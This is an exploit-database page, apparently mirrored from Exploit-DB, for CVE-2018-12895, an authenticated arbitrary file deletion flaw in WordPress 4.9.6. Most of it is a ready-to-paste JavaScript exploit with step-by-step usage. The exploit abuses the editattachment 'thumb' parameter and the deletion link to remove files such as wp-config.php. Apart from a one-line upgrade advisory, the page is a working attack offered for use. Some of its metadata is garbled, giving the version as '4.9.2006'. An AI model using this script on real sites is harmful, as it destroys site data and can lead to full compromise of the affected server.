header-logo
Suggest Exploit
vendor:
WordPress
by:
samguy
8.8
CVSS
HIGH
Arbitrary File Deletion
22
CWE
Product Name: WordPress
Affected Version From: 4.9.2006
Affected Version To: 4.9.2006
Patch Exists: YES
Related CWE: CVE-2018-12895
CPE: a:wordpress:wordpress:4.9.6
Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-12895/https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2018-12895/
Other Scripts:
Platforms Tested: Linux - Debian Buster (PHP 7.3)
2018

WordPress 4.9.6 – Arbitrary File Deletion (Authenticated) (2)

An authenticated user with privileges of an author can delete arbitrary files on the server by exploiting a vulnerability in the WordPress 4.9.6 version. The user can navigate to Media > Add New > Select Files > Open/Upload and click Edit > Open Developer Console > Paste this exploit script and execute the function, eg: unlink_thumb('../../../../wp-config.php').

Mitigation:

Upgrade to the latest version of WordPress and apply the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
# Date: 04/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
# Version: 4.9.6
# Tested on: Linux - Debian Buster (PHP 7.3)
# Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
# EDB : EDB-44949
# CVE : CVE-2018-12895

/*

Usage:
  1. Login to wordpress with privileges of an author
  2. Navigates to Media > Add New > Select Files > Open/Upload
  3. Click Edit > Open Developer Console > Paste this exploit script
  4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
*/

function unlink_thumb(thumb) {

  $nonce_id = document.getElementById("_wpnonce").value
  if (thumb == null) {
    console.log("specify a file to delete")
    return false
  }
  if ($nonce_id == null) {
    console.log("the nonce id is not found")
    return false
  }

  fetch(window.location.href.replace("&action=edit",""),
    {
      method: 'POST',
      credentials: 'include',
      headers: {'Content-Type': 'application/x-www-form-urlencoded'},
      body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
    })
    .then(function(resp0) {
      if (resp0.redirected) {
        $del = document.getElementsByClassName("submitdelete deletion").item(0).href
        if ($del == null) {
          console.log("Unknown error: could not find the url action")
          return false
        }
        fetch($del, 
          {
            method: 'GET',
            credentials: 'include'
          }).then(function(resp1) {
            if (resp1.redirected) {
              console.log("Arbitrary file deletion of " + thumb + " succeed!")
              return true
            } else {
              console.log("Arbitrary file deletion of " + thumb + " failed!")
              return false
            }
          })
      } else {
        console.log("Arbitrary file deletion of " + thumb + " failed!")
        return false
      }
    })
}

Navigation

Suggest Exploit

Services By CQR